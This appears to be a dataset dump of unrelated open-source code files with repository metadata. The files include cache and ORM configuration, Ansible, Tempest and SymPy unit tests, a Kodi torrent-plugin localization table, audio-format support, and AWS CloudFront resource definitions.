Session.configure(bind=self.engine)
|
if delete_everything == 'yes-really!':
self._delete_everything()
Base.metadata.create_all(self.engine)
@classmethod
|
def _apply_pragmas_callback(cls, connection, record):
connection.execute('PRAGMA journal_mode=WAL')
connection.execute('PRAGMA synchronous=NORMAL')
def _delete_everything(self):
Base.metadata.drop_all(self.engine)
|
astrobin/astrobin
|
astrobin/settings/components/caches.py
|
Python
|
agpl-3.0
| 824
| 0.002427
|
import os
CACHE_TYPE = os.environ.get('CACHE_TYPE', 'redis').strip()
if CACHE_TYPE == 'redis':
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': os.environ.get('CACHE_URL', 'redis://redis:6379/1').strip(),
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PICKLE_VERSION': 2,
'SERIALIZER':'astrobin.cache.CustomPickleSerializer',
},
'KEY_PREFIX': 'astrobin'
}
}
elif CACHE_TYPE == 'locmem':
CACHES = {
'default': {
|
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
|
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
|
t3dev/odoo
|
addons/mrp/models/__init__.py
|
Python
|
gpl-3.0
| 608
| 0
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import mrp_document
from . import mrp_abstract_workorder
from . import res_config_settings
from . import mrp_bo
|
m
from . import mrp_routing
from . import mrp_workcenter
from . import mrp_production
from . import stock_traceability
from . import mrp_unbuild
from . import mrp_workorder
from . import product
from . import res_company
from . import stock_move
from . import stock_picking
from . import stock_production_lot
from . import stock_rule
from . im
|
port stock_scrap
from . import stock_warehouse
|
helldorado/ansible
|
test/units/modules/network/f5/test_bigiq_device_facts.py
|
Python
|
gpl-3.0
| 3,123
| 0.00064
|
# -*- coding: utf-8 -*-
#
# Copyright: (c) 20
|
18, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigiq_device_facts import Parameters
|
from library.modules.bigiq_device_facts import SystemInfoFactManager
from library.modules.bigiq_device_facts import ModuleManager
from library.modules.bigiq_device_facts import ArgumentSpec
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigiq_device_facts import Parameters
from ansible.modules.network.f5.bigiq_device_facts import SystemInfoFactManager
from ansible.modules.network.f5.bigiq_device_facts import ModuleManager
from ansible.modules.network.f5.bigiq_device_facts import ArgumentSpec
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
gather_subset=['system-info'],
)
p = Parameters(params=args)
assert p.gather_subset == ['system-info']
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_get_facts(self, *args):
set_module_args(dict(
gather_subset=['system-info'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
fixture1 = load_fixture('load_shared_system_setup_1.json')
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
tm = SystemInfoFactManager(module=module)
tm.read_collection_from_device = Mock(return_value=fixture1)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert 'system_info' in results
|
googleapis/python-securitycenter
|
google/cloud/securitycenter_v1p1beta1/types/source.py
|
Python
|
apache-2.0
| 2,762
| 0.000362
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.securitycenter.v1p1beta1", manifest={"Source",},
)
class Source(proto.Message):
r"""Security Command Center finding source. A finding source
is an entity or a mechanism that can produce a finding. A source
is like a container of findings that come from the same scanner,
logger, monitor, etc.
Attributes:
name (str):
The relative resource name of this source. See:
https://cloud.google.com/apis/design/resource_names#relative_resource_name
Example:
"organizations/{organization_id}/sources/{source_id}".
display_name (str):
The source's display name.
A source's display name must be unique amongst
its siblings, for example, two sources with the
same parent can't share the same display name.
The display name must have a length between 1
and 64 characters (inclusive).
description (str):
The description of the source (max of 1024
characters). Example:
"Web Security Scanner is a web security scanner
for common vulnerabilities in App Engine
applications. It can automatically scan and
detect four common vulnerabilities, including
cross-site-scripting (XSS), Flash injection,
mixed content (HTTP in HTTPS), and
outdated/insecure libraries.".
canonical_name (str):
The canonical name of the finding. It's either
"organizations/{organization_id}/sources/{source_id}",
"folders/{folder_id}/sources/{source_id}" or
|
"projects/{project_number}/sources/{source_id}", depending
on the closest CRM ancestor of the resource associated with
the finding.
"""
name = proto.Field(proto.STRING, number=1,)
display_name = proto.Field(proto.STRING
|
, number=2,)
description = proto.Field(proto.STRING, number=3,)
canonical_name = proto.Field(proto.STRING, number=14,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
ntymtsiv/tempest
|
tempest/api/compute/v3/admin/test_servers.py
|
Python
|
apache-2.0
| 7,222
| 0
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
from tempest.test import attr
from tempest.test import skip_because
class ServersAdminV3Test(base.BaseV3ComputeAdminTest):
"""
Tests Servers API using admin privileges
"""
_interface = 'json'
@classmethod
def setUpClass(cls):
super(ServersAdminV3Test, cls).setUpClass()
cls.client = cls.servers_admin_client
cls.non_admin_client = cls.servers_client
cls.flavors_client = cls.flavors_admin_client
cls.s1_name = data_utils.rand_name('server')
resp, server = cls.create_test_server(name=cls.s1_name,
wait_until='ACTIVE')
cls.s1_id = server['id']
cls.s2_name = data_utils.rand_name('server')
resp, server = cls.create_test_server(name=cls.s2_name,
wait_until='ACTIVE')
cls.s2_id = server['id']
def _get_unused_flavor_id(self):
flavor_id = data_utils.rand_int_id(start=1000)
while True:
try:
resp, body = self.flavors_client.get_flavor_details(flavor_id)
except exceptions.NotFound:
break
flavor_id = data_utils.rand_int_id(start=1000)
return flavor_id
@attr(type='gate')
def test_list_servers_by_admin(self):
# Listing servers by admin user returns empty list by default
resp, body = self.client.list_servers_with_detail()
servers = body['servers']
self.assertEqual('200', resp['status'])
self.assertEqual([], servers)
@test.skip_because(bug='1265416')
@attr(type='gate')
def test_list_servers_by_admin_with_all_tenants(self):
# Listing servers by admin user with all tenants parameter
# Here should be listed all servers
params = {'all_tenants': ''}
resp, body = self.client.list_servers_with_detail(params)
servers = body['servers']
servers_name = map(lambda x: x['name'], servers)
self.assertIn(self.s1_name, servers_name)
self.assertIn(self.s2_name, servers_name)
@attr(type='gate')
def test_admin_delete_servers_of_others(self):
# Administrator can delete servers of others
_, server = self.create_test_server()
resp, _ = self.client.delete_server(server['id'])
self.assertEqual('204', resp['status'])
self.servers_client.wait_for_server_termination(server['id'])
@attr(type='gate')
def test_delete_server_while_in_error_state(self):
# Delete a server while it's VM state is error
resp, server = self.create_test_server(wait_until='ACTIVE')
resp, body = self.client.reset_state(server['id'], state='error')
self.assertEqual(202, resp.status)
# Verify server's state
resp, server = self.client.get_server(server['id'])
self.assertEqual(server['status'], 'ERROR')
resp, _ = self.client.delete_server(server['id'])
self.assertEqual('204', resp['status'])
@attr(type='gate')
def test_reset_state_server(self):
# Reset server's state to 'error'
resp, server = self.client.reset_state(self.s1_id)
self.assertEqual(202, resp.status)
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ERROR')
# Reset server's state to 'active'
resp, server = self.client.reset_state(self.s1_id, state='active')
self.assertEqual(202, resp.status)
|
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
@attr(type='gate')
@skip_because(bug="1240043")
def test_get_server_diagnostics_by_admin(self):
# Retrieve server diagnostics by admin user
resp, diagnostic = self
|
.client.get_server_diagnostics(self.s1_id)
self.assertEqual(200, resp.status)
basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop',
'tx_packets', 'tx_errors', 'tx_drop',
'read_req', 'write_req', 'cpu', 'memory']
for key in basic_attrs:
self.assertIn(key, str(diagnostic.keys()))
@attr(type='gate')
def test_list_servers_filter_by_error_status(self):
# Filter the list of servers by server error status
params = {'status': 'error'}
resp, server = self.client.reset_state(self.s1_id, state='error')
resp, body = self.non_admin_client.list_servers(params)
# Reset server's state to 'active'
resp, server = self.client.reset_state(self.s1_id, state='active')
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
servers = body['servers']
# Verify error server in list result
self.assertIn(self.s1_id, map(lambda x: x['id'], servers))
self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers))
@attr(type='gate')
def test_rebuild_server_in_error_state(self):
# The server in error state should be rebuilt using the provided
# image and changed to ACTIVE state
# resetting vm state require admin priviledge
resp, server = self.client.reset_state(self.s1_id, state='error')
self.assertEqual(202, resp.status)
resp, rebuilt_server = self.non_admin_client.rebuild(
self.s1_id, self.image_ref_alt)
self.addCleanup(self.non_admin_client.wait_for_server_status,
self.s1_id, 'ACTIVE')
self.addCleanup(self.non_admin_client.rebuild, self.s1_id,
self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.s1_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
self.non_admin_client.wait_for_server_status(rebuilt_server['id'],
'ACTIVE',
raise_on_error=False)
# Verify the server properties after rebuilding
resp, server = self.non_admin_client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
|
metabrainz/picard
|
picard/formats/mutagenext/tak.py
|
Python
|
gpl-2.0
| 2,426
| 0.000825
|
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2008 Lukáš Lalinský
# Copyright (C) 2013, 2018-2021 Laurent Monin
# Copyright (C) 2017 Sambhav Kothari
# Copyright (C) 2018-2019 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Tom's lossless Audio Kompressor streams with APEv2 tags.
TAK is a lossless audio compressor developed by Thomas Becker.
For more information, see http://wiki.hydrogenaudio.org/index.php?title=TAK
and http://en.wikipedia.org/wiki/TAK_(audio_codec)
"""
__all__ = ["TAK", "Open", "delete"]
try:
from mutagen.tak import (
Open,
TAK,
TAKHeaderError,
TAKInfo,
delete
)
native_tak = True
except ImportError:
from mutagen import StreamInfo
from mutagen.apev2 import (
APEv2File,
delete,
error,
)
native_tak = False
class TAKHeaderError(error):
pass
class TAKInfo(StreamInfo):
"""TAK stream information.
Attributes:
(none at the moment)
"""
def __init__(self, fileobj):
header = fileobj.read(4)
|
if len(header) != 4 or not header.startswith(b"tBaK"):
raise TAKHeaderError("not a TAK file")
@staticmethod
def pprint():
return "Tom's lossless Audio Kompressor"
class TAK(APEv2File):
"""TAK(filething)
Arguments:
filething (filething)
Attributes:
i
|
nfo (`TAKInfo`)
"""
_Info = TAKInfo
_mimes = ["audio/x-tak"]
@staticmethod
def score(filename, fileobj, header):
return header.startswith(b"tBaK") + filename.lower().endswith(".tak")
Open = TAK
|
chimkentec/KodiMODo_rep
|
plugin.video.torrenter/Localization.py
|
Python
|
gpl-3.0
| 56,942
| 0.008658
|
# -*- coding: utf-8 -*-
'''
Torrenter v2 plugin for XBMC/Kodi
Copyright (C) 2012-2015 Vadim Skorba v1 - DiMartino v2
https://forums.tvaddons.ag/addon-releases/29224-torrenter-v2.html
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
try:
import xbmcaddon
__settings__ = xbmcaddon.Addon(id='plugin.video.torrenter')
language = ('en', 'ru', 'uk','he')[int(__settings__.getSetting("language"))]
except:
language = 'ru'
def localize(text):
dictionary = {
'he': {
'Seeds searching.': 'חיפוש זורעים',
'Please Wait': 'המתן',
'Information': 'מידע',
'Torrent downloading is stopped.': 'הורדה הופסקה',
'Search': 'חפש',
'Seeds': 'זורעים',
'Peers': 'יונקים',
'Materials are loading now.': 'עולה כעת',
'Search Phrase': 'חפש',
'Magnet-link is converting': 'הקובץ נטען',
'Error': 'טעות',
'Your library out of date and can\'t save magnet-links.': 'הספריה אינה מעודכנת',
'Bookmarks': 'סימניות',
'Logout': 'התנתק',
'Login': 'התחבר',
'Recent Materials': 'חומרים אחרונים ',
'Register': 'הרשם',
'Bookmark': 'סמניות',
'Item successfully added to Bookmarks': 'הפריט הוסף לסמניות',
'Item successfully removed from Bookmarks': 'הפריט הוסר מהסימניות בהצלחה',
'Bookmark not added': 'סימניה לא הוספה',
'Bookmark not removed': 'הסימניה לא הוסרה',
'Add To Bookmarks': 'הוסף לסימניות',
'Remove From Bookmarks': 'הסר מסימניות',
'Auth': 'אישור',
'Already logged in': 'Already logged in',
'Input Email (for password recovery):': 'Input Email (for password recovery):',
'Input Email:': 'Input Email:',
'Input Password (6+ symbols):': 'Input Password (6+ symbols):',
'Input Password:': 'Input Password',
'Login successfull': 'Login successfull',
'Login failed': 'Login failed',
'User not logged in': 'Пользователь не в системе',
'User successfully logged out': 'User successfully logged out',
'Preloaded: ': 'טוען מראש',
'Do you want to STOP torrent downloading and seeding?': 'להפסיק הורדת טורנט?',
'Torrent Downloading': 'טורנט בהורדה',
'Auth expired, please relogin': 'Auth expired, please relogin',
'Storage': 'אחסון',
'Storage has been cleared': 'אחסון נוקה',
'Clear Storage': 'נקה אחסון',
'Popular': 'פופולארי',
'Views': 'צפיות',
'Uploading': 'מעלה',
'Download': 'מוריד',
'Input symbols from CAPTCHA image:': 'Input symbols from CAPTCHA image:',
'Please, rate watched video:': 'Please, rate watched video:',
'Bad': 'Bad',
'So-So': 'So-So',
'Good': 'Good',
'Ratings': 'Ratings',
'Rating': 'דירוג',
'Retry': 'נסה שנית',
'%ds has left': '%ds has left',
'File failed to play! Do you want to RETRY and buffer more?': 'הקובץ נכשל האם לנסות שנית?',
'High Priority Files': 'קבצים בחשיבות עליונה',
'Skip All Files': 'דלג על כל הקבצים',
'Start': 'התחל',
'Stop': 'עצור',
'Play':'נגן',
'High Priority': 'חשיבות גבוהה',
'Skip File': 'דלג על הקובץ',
'Remove': 'הסר',
'Remove with files': 'הסר קבצים',
'Play File': 'נגן קובץ',
'Start All Files': 'התחל את כל הקבצים',
'Stop All Files': 'הפסק את כל הקבצים',
'Torrent-client Browser': 'דפדפן טורנט',
'Remote Torrent-client': 'טורנט מרוחק',
'You didn\'t set up replacement path in setting.': 'נא למלא נתיב לשמירה בהגדרות',
'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?',
'Manual Torrent-client Path Edit': 'Manual Torrent-client Path Edit',
'Choose .torrent in video library': 'בחר בטורנט מהספריה',
'.torrent Player': 'נגן טורנט',
'Choose directory:': 'בחר מיקום:',
'Starting download next episode!': 'מתחיל להורד בפרק הבא',
'Choose in torrent-client:': 'בחר לקוח טורנט',
'Search Control Window': 'הגדרת טראקרים',
'Magnet-link (magnet:...)': ' (magnet:...)קישור מגנט',
'Not a magnet-link!': 'לא קישור מגנט',
'Magnet-link Player': 'נגן קישור מגנט',
'UNKNOWN STATUS': 'סטטוס לא ידוע',
'Checking preloaded files...': 'בודק קבצים',
'Waiting for website response...': 'ממתין לתשובת האתר ',
'Search and cache information for:': 'תקצירי הסרטים יורדים',
'Open Torrent': 'פתח טורנט',
'Torrent list is empty.': 'רשימה ריקה',
'Content Lists': 'רשימות תוכן ההרחבה',
'Canceled by User': 'בוטל',
'Do you want to search and cache full metadata + arts?': 'האם תרצה להוריד מידע על הסרטים'
|
,
'This vastly decreases load speed, but you will be asked to download premade bases!': 'זה יאט את קצב ההעלאה אך יוריד מיד
|
ע על הסרטים',
'Do you want to preload full metadata?': 'האם תרצה להוריד את כל המידע',
'It is highly recommended!': 'מומלץ',
'TV Shows': 'סדרות',
'Cartoons': 'אנימציה',
'Anime': 'אנימה',
'Most Recent': 'החדשים ביותר',
'Top 250 Movies': '250 הטובים ביותר',
'Top All Time': 'הטובים בכל הזמנים',
'by Genre': 'לפי קטגוריה',
'by Year': 'לפי שנה',
'Action': 'פעולה',
'Adventure': 'הרפתקאות',
'Animation': 'אנימציה',
'Biography': 'ביוגרפי',
'Comedy': 'קומדיה',
'Crime': 'פשע',
'Documentary': 'דוקומנטרי',
'Drama': 'דרמה',
'Family': 'משפחתי',
'Fantasy': 'פנטסיה',
'Film-Noir': 'פילם נואר',
'History': 'היסטורי',
'Horror': 'אימה',
'Music': 'מוזיקה',
'Musical': 'מחזמר',
'Mystery': 'מסתורי',
'Romance': 'רומנטי',
'Sci-Fi': 'מדע בדיוני',
'Short': 'קצר',
'Sport': 'ספורט',
'Thriller': 'מותחן',
'War': 'מלחמתי',
'Western': 'מערבון',
'[B]by Site[/B]': '[B]על פי אתר[/B]',
'Cartoons Series': 'סדרה מצוירת',
'Cartoons Short': 'מצוירים -קצר',
'Male': 'גבר',
'Female': 'אשה',
'Russia & USSR': 'רוסיה',
'Next Page': 'הדף הבא',
'Previous Page': 'הדף הקודם',
'Russian Movies': 'סרטים רוסיים',
'israeli Movies': 'סרטים ישראלים',
'hebdub movies': 'סרטים מדובבים',
'Movies': 'סרטים',
'High Resolution Movies': 'סרטים באיכות גבוהה',
'3D Movies': '3D סרטי',
'Movies [Bluray]': ' [Bluray] סרטים ',
'Anime Film': 'סרטי אנימה',
'Anime Series': 'סדרות אנימה',
'Can\'t download torrent, probably no seeds available.': 'לא ניתן להוריד את הטורנט אין מספיק זורעים',
'Personal List': 'רשימה אישית',
'Add to %s': '%s הוסף ל ',
'Delete from %s': 'מחק מ %s',
'Added!': 'נוסף!',
'Deleted!': 'נמחק',
'Sear
|
wxgeo/geophar
|
wxgeometrie/sympy/codegen/tests/test_rewriting.py
|
Python
|
gpl-2.0
| 4,843
| 0.000413
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
from sympy import log, exp, Symbol, Pow, sin
from sympy.printing.ccode import ccode
from sympy.codegen.cfunctions import log2, exp2, expm1, log1p
from sympy.codegen.rewriting import (
optimize, log2_opt, exp2_opt, expm1_opt, log1p_opt, optims_c99,
create_expand_pow_optimization
)
from sympy.utilities.pytest import XFAIL
def test_log2_opt():
x = Symbol('x')
expr1 = 7*log(3*x + 5)/(log(2))
opt1 = optimize(expr1, [log2_opt])
assert opt1 == 7*log2(3*x + 5)
assert opt1.rewrite(log) == expr1
expr2 = 3*log(5*x + 7)/(13*log(2))
opt2 = optimize(expr2, [log2_opt])
assert opt2 == 3*log2(5*x + 7)/13
assert opt2.rewrite(log) == expr2
expr3 = log(x)/log(2)
opt3 = optimize(expr3, [log2_opt])
assert opt3 == log2(x)
assert opt3.rewrite(log) == expr3
expr4 = log(x)/log(2) + log(x+1)
opt4 = optimize(expr4, [log2_opt])
assert opt4 == log2(x) + log(2)*log2(x+1)
assert opt4.rewrite(log) == expr4
expr5 = log(17)
opt5 = optimize(expr5, [log2_opt])
assert opt5 == expr5
expr6 = log(x + 3)/log(2)
opt6 = optimize(expr6, [log2_opt])
assert str(opt6) == 'log2(x + 3)'
assert opt6.rewrite(log) == expr6
def test_exp2_opt():
x = Symbol('x')
expr1 = 1 + 2**x
opt1 = optimize(expr1, [exp2_opt])
assert opt1 == 1 + exp2(x)
assert opt1.rewrite(Pow) == expr1
expr2 = 1 + 3**x
assert expr2 == optimize(expr2, [exp2_opt])
def test_expm1_opt():
x = Symbol('x')
expr1 = exp(x) - 1
opt1 = optimize(expr1, [expm1_opt])
assert expm1(x) - opt1 == 0
assert opt1.rewrite(exp) == expr1
expr2 = 3*exp(x) - 3
opt2 = optimize(expr2, [expm1_opt])
assert 3*expm1(x) == opt2
assert opt2.rewrite(exp) == expr2
expr3 = 3*exp(x) - 5
assert expr3 == optimize(expr3, [expm1_opt])
expr4 = 3*exp(x) + log(x) - 3
opt4 = optimize(expr4, [expm1_opt])
assert 3*expm1(x) + log(x) == opt4
assert opt4.rewrite(exp) == expr4
expr5 = 3*exp(2*x) - 3
opt5 = optimize(expr5, [expm1_opt])
assert 3*expm1(2*x) == opt5
assert opt5.rewrite(exp) == expr5
@XFAIL
def test_expm1_two_exp_terms():
x, y = map(Symbol, 'x y'.split())
expr1 = exp(x) + exp(y) - 2
opt1 = optimize(expr1, [expm1_opt])
assert opt1 == expm1(x) + expm1(y)
def test_log1p_opt():
x = Symbol('x')
expr1 = log(x + 1)
opt1 = optimize(expr1, [log1p_opt])
assert log1p(x) - opt1 == 0
assert opt1.rewrite(log) == expr1
expr2 = log(3*x + 3)
opt2 = optimize(expr2, [log1p_opt])
assert log1p(x) + log(3) == opt2
assert (opt2.rewrite(log) - expr2).simplify() == 0
expr3 = log(2*x + 1)
opt3 = optimize(expr3, [log1p_opt])
assert log1p(2*x) - opt3 == 0
assert opt3.rewrite(log) == expr3
expr4 = log(x+3)
opt4 = optimize(expr4, [log1p_opt])
assert str(opt4) == 'log(x + 3)'
def test_optims_c99():
x = Symbol('x')
expr1 = 2**x + log(x)/log(2) + log(x + 1) + exp(x) - 1
opt1 = optimize(expr1, optims_c99).simplify()
assert opt1 == exp2(x) + log2(x) + log1p(x) + expm1(x)
assert opt1.rewrite(exp).rewrite(log).rewrite(Pow) == expr1
expr2 = log(x)/log(2) + log(x + 1)
opt2 = optimize(expr2, optims_c99)
assert opt2 == log2(x) + log1p(x)
assert opt2.rewrite(log) == expr2
expr3 = log(x)/log(2) + log(17*x + 17)
opt3 = optimize(expr3, optims_c99)
delta3 = opt3 - (log2(x) + log(17) + log1p(x))
assert delta3 == 0
assert (opt3.rewrite(log) - expr3).simplify() == 0
expr4 = 2**x + 3*log(5*x + 7)/(13*log(2)) + 11*exp(x) - 11 + log(17*x + 17)
opt4 = optimize(expr4, optims_c99).simplify()
delta4 = opt4 - (exp2(x) + 3*log2(5*x + 7)/13 + 11*expm1(x) + log(17) + log1p(x))
assert delta4 == 0
assert (opt4.rewrite(exp).rewrite(log).rewrite(Pow) - expr4).simplify() == 0
expr5 = 3*exp(2*x) - 3
opt5 = optimize(expr5, optims_c99)
delta5 = opt5 - 3*expm1(2*x)
assert delta5 == 0
assert opt5.rewrite(exp) == expr5
expr6 = exp(2*x) - 3
opt6 = optimize(expr6, optims_c99)
delta6 = opt6 - (exp(2*x) - 3)
assert delta6 == 0
expr7 = log(3*x + 3)
o
|
pt7 = optimize(expr7, optims_c99)
delta7 = opt7 - (log(3) + log1p(x))
assert delta7 == 0
assert (opt7.rewrite(log) - expr7).simplify() == 0
expr8 = log(2*x + 3)
opt8 = optimize(expr8, optims_c99)
assert opt8 == ex
|
pr8
def test_create_expand_pow_optimization():
my_opt = create_expand_pow_optimization(4)
x = Symbol('x')
assert ccode(optimize(x**4, [my_opt])) == 'x*x*x*x'
x5x4 = x**5 + x**4
assert ccode(optimize(x5x4, [my_opt])) == 'pow(x, 5) + x*x*x*x'
sin4x = sin(x)**4
assert ccode(optimize(sin4x, [my_opt])) == 'pow(sin(x), 4)'
|
mitchellrj/touchdown
|
touchdown/aws/cloudfront/streaming_distribution.py
|
Python
|
apache-2.0
| 6,002
| 0.001666
|
# Copyright 2014-2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from touchdown.core.resource import Resource
from touchdown.core.plan import Plan, Present
from touchdown.core import argument, serializers
from ..account import BaseAccount
from ..common import SimpleDescribe, SimpleApply, SimpleDestroy, RefreshMetadata
from ..s3 import Bucket
from .. import route53
from .common import CloudFrontList
class StreamingLoggingConfig(Resource):
resource_name = "streaming_logging_config"
dot_ignore = True
enabled = argument.Boolean(field="Enabled", default=False)
bucket = argument.Resource(Bucket, field="Bucket", serializer=serializers.Default(default=None), default="")
prefix = argument.String(field="Prefix", default="")
class StreamingDistribution(Resource):
resource_name = "streaming_distribution"
extra_serializers = {
"CallerReference": serializers.Expression(
lambda runner, object: runner.get_plan(object).object.get('StreamingDistributionConfig', {}).get('CallerReference', str(uuid.uuid4()))
),
"Aliases": CloudFrontList(serializers.Chain(
serializers.Context(serializers.Argument("cname"), serializers.ListOfOne(maybe_empty=True)),
serializers.Context(serializers.Argument("aliases"), serializers.List()),
)),
"TrustedSigners": serializers.Const({
"Enabled": False,
"Quantity": 0,
}),
"S3Origin": serializers.Resource(group="s3origin"),
}
name = argument.String()
cname = argument.String(default=lambda instance: instance.name)
comment = argument.String(field='Comment', default=lambda instance: instance.name)
aliases = argument.List()
enabled = argument.Boolean(default=True, field="Enabled")
bucket = argument.Resource(
Bucket,
field="DomainName",
serializer=serializers.Format("{0}.s3.amazonaws.com", serializers.Identifier()),
group="s3origin"
)
origin_access_identity = argument.String(default='', field="OriginAccessIdentity", group="s3origin")
logging = argument.Resource(
StreamingLoggingConfig,
default=lambda instance: dict(enabled=False),
field="Logging",
serializer=serializers.Resource(),
)
price_class = argument.String(
default="PriceClass_100",
choices=['PriceClass_100', 'PriceClass_200', 'PriceClass_All'],
field="PriceClass",
)
account = argument.Resource(BaseAccount)
class Describe(SimpleDescribe, Plan):
resource = StreamingDistribution
service_name = 'cloudfront'
describe_filters = {}
describe_action = "list_streaming_distributions"
describe_envelope = 'StreamingDistributionList.Items'
key = 'Id'
def get_describe_filters(self):
return {"Id": self.object['Id']}
def describe_object_matches(self, d):
return self.resource.name == d['Comment'] or self.resource.name in d['Aliases'].get('Items', [])
def describe_object(self):
distribution = super(Describe, self).describe_object()
if distribution:
result = self.client.get_streaming_distribution(Id=distribution['Id'])
distribution = {"ETag": result["ETag"], "Id": distribution["Id"]}
distribution.update(result['StreamingDistribution'])
return distribution
class Apply(SimpleApply, Describe):
create_action = "create_streaming_distribution"
create_response = "not-that-useful"
waiter = "streaming_distribution_deployed"
signature = (
Present("name"),
Present("bucket"),
)
def get_create_serializer(self):
return serializers.Dict(
StreamingDistributionConfig=serializers.Resource(),
)
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_streaming_distribution"
def get_destroy_serializer(self):
return serializers.Dict(
Id=self.resource_id,
IfMatch=serializers.Property('ETag'),
)
def destroy_object(self):
if not self.object:
return
if self.object['StreamingDistributionConfig'].get('Enabled', False):
yield self.generic_action(
"Disable streaming distribution",
self.client.update_streaming_distribution,
Id=self.object['Id'],
IfMatch=self.object['ETag'],
Str
|
eamingDistributionConfig=serializers.Resource(
Enabled=False,
),
)
yield self.get_
|
waiter(
["Waiting for streaming distribution to enter disabled state"],
"streaming_distribution_deployed",
)
yield RefreshMetadata(self)
for change in super(Destroy, self).destroy_object():
yield change
class AliasTarget(route53.AliasTarget):
""" Adapts a StreamingDistribution into a AliasTarget """
input = StreamingDistribution
def get_serializer(self, runner, **kwargs):
return serializers.Context(
serializers.Const(self.adapts),
serializers.Dict(
DNSName=serializers.Context(
serializers.Property("DomainName"),
serializers.Expression(lambda r, o: route53._normalize(o)),
),
HostedZoneId="Z2FDTNDATAQYW2",
EvaluateTargetHealth=False,
)
)
|
michaelarnauts/home-assistant
|
homeassistant/components/script.py
|
Python
|
mit
| 5,105
| 0
|
"""
